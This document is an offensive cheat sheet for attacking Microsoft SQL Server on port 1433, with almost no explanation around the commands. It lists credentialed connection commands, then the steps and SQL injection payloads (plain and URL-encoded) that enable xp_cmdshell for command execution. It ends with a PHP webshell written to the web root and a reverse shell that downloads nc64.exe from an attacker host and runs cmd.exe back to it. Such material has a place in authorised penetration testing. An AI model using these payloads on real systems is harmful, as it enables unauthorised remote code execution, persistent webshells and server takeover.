MSSQL (1433)
1. Basics
Initiate connection
sqsh -S <IP> -U <username> -P "<pass>"
sqsh -S <IP> -U .\\<Username> -P <pass> -D <database>
impacket-mssqlclient :<username>:<pass>@<IP> -windows-auth
impacket-mssqlclient :<username>:<pass>@<IP> -local-auth2. Reverse Shell
1. Initiate Connection with either mysql or sqsh
# In sqsh, you need to use GO after writing the query to send it
Do one by one each command:
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
# This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'Manual Code Execution:
Steps to enable `xp_cmdshell`
'; EXEC sp_configure "show advanced options", 1; -- //
'; RECONFIGURE; -- //
'; EXEC sp_configure "xp_cmdshell", 1; -- //
'; RECONFIGURE; -- //
'; EXEC xp_cmdshell "whoami"; -- //
Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //
URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2FPayload Example:
Insert webshell into web root directory -
"<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"
Initiating reverse shell with nc64.exe via injected webshell -
curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>Last updated